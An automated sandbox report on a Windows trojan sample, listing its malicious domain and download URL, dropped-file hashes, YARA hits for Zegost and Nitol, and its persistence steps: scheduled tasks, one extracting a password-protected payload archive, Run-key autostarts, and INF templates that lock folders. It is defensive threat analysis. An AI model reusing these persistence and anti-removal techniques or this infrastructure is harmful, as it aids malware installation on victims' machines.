Name | IP | Active | Malicious | Antivirus Detection | Reputation
ooddoo.top | 104.21.81.224 | true | true | |
prod.globalsign.map.fastly.net | 151.101.2.133 | true | false | |
Name | Malicious | Antivirus Detection | Reputation
https://ooddoo.top/abc/14.exe | true | |
http://ooddoo.top/abc/14.exe | true | |
IP | Domain | Country | ASN | ASN Name | Malicious
202.79.169.178 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
104.21.81.224 | ooddoo.top | United States | 13335 | CLOUDFLARENETUS | true
                                                                                                                  IP
                                                                                                                  127.0.0.1
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1582022
                                                                                                                  Start date and time:2024-12-29 16:08:16 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 15m 26s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:162
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:Lets-x64.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@245/106@1/3
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 42.9%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212, 172.202.163.200
                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ocsp2.globalsign.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, global.prd.cdn.globalsign.com
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2820 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5996 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:09:16 | API Interceptor | 463x Sleep call for process: powershell.exe modified
10:09:34 | API Interceptor | 603223x Sleep call for process: _P18sPbB.exe modified
10:09:38 | API Interceptor | 3x Sleep call for process: svchost.exe modified
10:09:46 | API Interceptor | 3054x Sleep call for process: iusb3mon.exe modified
16:09:35 | Task Scheduler | Run new task: UserLoginStartupTask path: C:\ProgramData\program\iusb3mon.exe
16:09:40 | Task Scheduler | Run new task: Windows Audio Endpoint Builder() path: C:\ProgramData\Data\un.exe s>x -o- -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\ /st
16:09:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:10:10 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:10:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:10:58 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  No context
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):15405152
                                                                                                                  Entropy (8bit):7.9969741858269074
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:393216:3Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpw:3Rh8B2vB2c+kZD
                                                                                                                  MD5:E039E221B48FC7C02517D127E158B89F
                                                                                                                  SHA1:79EED88061472AE590616556F31576CA13BFC7FB
                                                                                                                  SHA-256:DC30E5DAB15392627D30A506F6304030C581FC00716703FC31ADD10FF263D70B
                                                                                                                  SHA-512:87231C025BB94771E89A639C9CB1528763F096059F8806227B8AB45A8F1EA5CD3D94FDC91CB20DD140B91A14904653517F7B6673A142A864A58A2726D14AE4B8
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Reputation:unknown
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3810
                                                                                                                  Entropy (8bit):3.5689360433547153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:tCnRigEptnknQGdinigV9ll7dHAmzFzJE+:WRGryQxnjrHy+
                                                                                                                  MD5:69C282FDCD177C1AC4D6709EF841DA65
                                                                                                                  SHA1:575CBAC132F5215C9446E6B440CA44A2082F0644
                                                                                                                  SHA-256:943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
                                                                                                                  SHA-512:6B686A5D6AABE4681C6E1C83D4F32BD55D9FA26FC25ED72ECD20676C6DD3BD49CEE4F1E5D1B25F2D3A90A994BE00BF3B1366075272D4C3EA16917806DBBE0EA7
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
Preview (UTF-16 text decoded; truncated as in the report):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2022-10-24T03:31:27</Date>
    <Author>Administrator</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <StartBoundary>2022-10-24T03:31:00</StartBoundary>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>Administrator</UserId>
      <LogonT
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):0.3588072191296206
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                                                  MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                                                  SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                                                  SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                                                  SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.8337366151111992
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugN:gJjJGtpTq2yv1AuNZRY3diu8iBVqF7
                                                                                                                  MD5:F88F9AAB06ED8968527D450DE10F58F3
                                                                                                                  SHA1:2A693E0C303773FC44CE2CAE5FE1DF82853B3920
                                                                                                                  SHA-256:C16C47D37ED7CFB31FD7F2C200A24E3865D5259490FEB08797AA4FCEBCCD85EA
                                                                                                                  SHA-512:F619FB2D0582B7983DDA1C007CD0622797B92D1EA781DF9BE78BA92813E091A69BD4F11A7AFD37490E2E4FCED14D87EC149B214443E229D4136CC836F8929000
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdaf4623d, page size 16384, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.6584764620230587
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                  MD5:CAE6A711925E1BD37F65D18DA89BE621
                                                                                                                  SHA1:AD4351F66DBF2C1282DE29A3DC64B55C7888E680
                                                                                                                  SHA-256:0C30A90E25C0D059D154E4A744E01D1E08B1B0EC9C835C42C372335BEFE9A437
                                                                                                                  SHA-512:0BA518B38A4C849669CED4617A539803CD29297789143825B3D3596C71C52A3062BDA7B9E0218B499A5C7ADF59F1090BCBBE1D969376DFB36A2104A74F66992D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..b=... ...............X\...;...{......................T.~.....4....|..&....|..h.|.....4....|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................'Rc4....|..................(n.4....|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16384
                                                                                                                  Entropy (8bit):0.07913686262756893
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:E3m/setYe0EuVD3i1gq4pEOOLF3iYll58Kgvvl/QoeP/ll:E3mdzNuVD3i1gq4pEOOxiIz8KgR+t
                                                                                                                  MD5:5F5C70A45CCDDA2F7764BAAF4C3870E8
                                                                                                                  SHA1:5B436806114CB26D272810C2F69E1618FE73316E
                                                                                                                  SHA-256:34772680D41E1D19362BAE352A6D22B37E5BEF109C3CEE58617ADC6CF28A0270
                                                                                                                  SHA-512:BDD51D13735AA612318EEA5286CCD47B6C77D0B6A120925A3CF1AFDB72FB5EF552FFCA71226A2E3412C75E430E81F840C01FA4A9A99DF7BC5DF387F769ABF667
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:.......................................;...{..&....|..4....|..........4....|..4....|../"..4....|...................(n.4....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:DOS executable (COM)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):226751
                                                                                                                  Entropy (8bit):6.2660733927228165
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:x/x6F5WCmLGEOmC4v8Z0J+c4v8Z0J+FI8:x/xSWYEOO
                                                                                                                  MD5:DAAA9CCA71158FDE7CF6AC5183D8603B
                                                                                                                  SHA1:75EC321977385303E71484FF0BC321A2898C63B1
                                                                                                                  SHA-256:E1A6BA897AD0D5F5B0580BC82AD3C2D6AD9621B3B88D9E66ED5673FF60FB24AF
                                                                                                                  SHA-512:9F307AF2D74CAE1018D25249741CC83FE34A0A0AA57C78CCAE34B70AD37B8427B4FB3DF96EC58E9E6599154BD0787001E67D8DEAE41B9F1598870774D64762EB
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:....U....SV.q<W.U.D.x..tm.|.|.tf.\...]...t[.T...t. ..D.$..U...3.u..E..t:.<.3....}.....t...i..........C....u.].......;u.t..u.B;.r.3._^[..].}..u..E....P.U.......WQ.U...U..Q.e.......X-.....E..E...].U..QQd.0...SVW.@...P..A..r$3.z(...~.........ar......i.........Nu.....................u.3.j..T..........P.x. ..........3.b4.^.C........3.s.H..C........3...\p.C...........C..E..E.ntdlf.E.l.P.S..3...y....._....3......C....N...YY_^.C.[..].r..a...U......M..E.SV..u.3......MZ..f9.u.W.x<...?PE....s....L...f9G...d......f9G...W...j@h.....wP3.S.Q.......=....wT.E..u.V.P..~<3....]..}.f;G.sX.]......E..H...t+..8.t..0.@...P.E.Q.P.....8.v..w8.E.Q.P..E..M...(.E.A..G.;.M..E.|.3........t`9.....tX..0.E.B..]...E...~1..TY....E..0..%....f;E.u...........+G4..2C;].|.3.E....A....E.....u.........t.9.....tw...i..P.E..P..E...."....E.....u..H..P...M...U....t3.]...y.......F...P.u.........E.....E.....u.}.3.E.....E..@...u.........t?.L1.3.j.X+..M......]..E.E..t...Sj.V...M..E...@.M..E.;.u
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2766808
                                                                                                                  Entropy (8bit):7.933976018907124
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:U+tZSmbzaMRyI0buyb4lhjlTJuv3bA6gmq4xzJEU3llQfqQjF0jR:U+aIc2JTJu/bfFq4xj3vIqB
                                                                                                                  MD5:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  SHA1:757005A267819F25A7F1179C01210569D1B984AB
                                                                                                                  SHA-256:B2044FBEBA355178E0D584F5F467B946C48FDD25AD3282C40E20C2E13FFC16C7
                                                                                                                  SHA-512:60207EA69689D4DDB9B830AD5C64A9F77124C61DD4F4CB87E48E238B4E4183BAD2DE18B304921ED844877A5588704A136F00661B1FE813E0DA843101B2E28FD6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.;...........@...........................c......u*...@..................................0.......@..@.............)..U.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .!...........n..............@..@ ,............|..............@..B.idata.......0......................@....rsrc........@......................@..@.winlice.@8..`......................`....boot.....(...;...(.................`..`........................................................................................................................
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16
                                                                                                                  Entropy (8bit):4.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:g8UIkPj:gFxj
                                                                                                                  MD5:55E1040BAD0503B2DA8563DD7385B308
                                                                                                                  SHA1:EA1E541B56DE241E93B2A4CF34E5C1BB7069E4A7
                                                                                                                  SHA-256:47C8AE61658501EA8C804044AB259B7DEA5C82FFC5B28D40EEC13492FD4D8EB0
                                                                                                                  SHA-512:0A84D6E01D8368F49B8285C07B778D2574DE59C43FFFC50A8151B326A5977065D0771738BF6467C0A2424F30964277B502EF52E298B78EACEDE920982F4E8C3B
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..R.v.m.....Y.T
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2766808
                                                                                                                  Entropy (8bit):7.933976018907124
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:U+tZSmbzaMRyI0buyb4lhjlTJuv3bA6gmq4xzJEU3llQfqQjF0jR:U+aIc2JTJu/bfFq4xj3vIqB
                                                                                                                  MD5:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  SHA1:757005A267819F25A7F1179C01210569D1B984AB
                                                                                                                  SHA-256:B2044FBEBA355178E0D584F5F467B946C48FDD25AD3282C40E20C2E13FFC16C7
                                                                                                                  SHA-512:60207EA69689D4DDB9B830AD5C64A9F77124C61DD4F4CB87E48E238B4E4183BAD2DE18B304921ED844877A5588704A136F00661B1FE813E0DA843101B2E28FD6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.;...........@...........................c......u*...@..................................0.......@..@.............)..U.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .!...........n..............@..@ ,............|..............@..B.idata.......0......................@....rsrc........@......................@..@.winlice.@8..`......................`....boot.....(...;...(.................`..`........................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:@...e...........................................................
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):390
                                                                                                                  Entropy (8bit):3.70121954190789
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q+eSREiRFGjowZaDaK2YhvfqlbTb47ZkW:Q+eSREMAF42SiJP4lB
                                                                                                                  MD5:B66F55531E3BC2059BC9DC2925BD022D
                                                                                                                  SHA1:D2F77035A6CFFF4F3FCE7F08902B790623C5C48A
                                                                                                                  SHA-256:1A19404888C3463A206AE85DA582A233E4FF74E5AFEA7FCE71D24E3F71F88B8C
                                                                                                                  SHA-512:8FE726CACE14EEFEDEBA9E9367F9D415B631525BF4EC1DD43C0A91890EF92382C1D24631165566114468BF0C38999569C7D5BAA3089BE1606DC243D2116FC129
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                   Preview (UTF-16 text, decoded):[Unicode]
                                                                                                                   Unicode=yes
                                                                                                                   [Version]
                                                                                                                   signature="$CHICAGO$"
                                                                                                                   Revision=1
                                                                                                                   [Privilege Rights]
                                                                                                                   SeDebugPrivilege = *S-1-5-18
                                                                                                                   [File Security]
                                                                                                                   "C:\ProgramData\Program",0,"D:AR(D;OICI;DTSDRCWD;;;WD)"
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):402
                                                                                                                  Entropy (8bit):3.119365858996026
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:QUlpORbl/Hml1NG3g+1bElaMiA/CIU9MWl9:Q/RbVar+RDAjUXv
                                                                                                                  MD5:D1C0BC599A4C572AE9594D1E1E10BC07
                                                                                                                  SHA1:633550F3435365D5DB14D7AC40753DFC2EE5A7F0
                                                                                                                  SHA-256:5B66B234FD58126EF3E32582E46101E10970D61083D7F9439EB04E2A151FEB49
                                                                                                                  SHA-512:4E75A7C8A72820212F61AAD771FAD6C61E5CD432F7B5E39C1DEB8E975BF8BE3F2A317E12F49996D0685A6FAB8AED34B7D4A3D8D6829CA65D41E5F65713025CC5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:.. .Y.o.u. .d.o. .n.o.t. .h.a.v.e. .s.u.f.f.i.c.i.e.n.t. .p.e.r.m.i.s.s.i.o.n.s. .t.o. .p.e.r.f.o.r.m. .t.h.i.s. .c.o.m.m.a.n.d... . .M.a.k.e. .s.u.r.e. .t.h.a.t. .y.o.u. .a.r.e. .r.u.n.n.i.n.g. .a.s. .t.h.e. .l.o.c.a.l. .a.d.m.i.n.i.s.t.r.a.t.o.r. .o.r. .h.a.v.e. .o.p.e.n.e.d. .t.h.e. .c.o.m.m.a.n.d. .p.r.o.m.p.t. .u.s.i.n.g. .t.h.e. .'.R.u.n. .a.s. .a.d.m.i.n.i.s.t.r.a.t.o.r.'. .o.p.t.i.o.n.......
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):384
                                                                                                                  Entropy (8bit):3.6991205247583334
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvfgDJrlbhEZUEn4lywCfHhkW:Q+eSREiRFGjowZaDaK2YhvfqlbEd7ZkW
                                                                                                                  MD5:FA353436F217DA03FE4519A7E87768CC
                                                                                                                  SHA1:766A1F589BABFD00B0CC0FEEDDB22E7DB408E975
                                                                                                                  SHA-256:A0814A0E57FD427C73E0938D4B507EA43CDF1A720D27D36E5C7530099082E1CC
                                                                                                                  SHA-512:43C3A23178A71B714FB9AEF57F8CB413C13E001DD28BD3DC0F23272F7FECEBB83E24892F0CF59331C1D6B111DCE7A91965793D2BE435939FAD72B184AFFB074F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.D.a.t.a.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):242
                                                                                                                  Entropy (8bit):3.536378176812677
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvn:Q+eSREiRFGjowZaDaK2Yhvn
                                                                                                                  MD5:1F3CD3C20662B3BB095A373DBD1DEC58
                                                                                                                  SHA1:D5AA739E0BF5D0B103713AF5BBA01359530AABDF
                                                                                                                  SHA-256:7EA20DD93DBB33C14C7D9772B39828B3360FBE080DF2B5AAD14BA3D838E18DA5
                                                                                                                  SHA-512:08C554EE7F897B070DF94E6F3B5B366AE69B12D16F90D34B4CD4D9C95037D6178447B39E732FCCF898F6C768318AB117B03DB2363CD55CFACD7F53530D86FE0C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
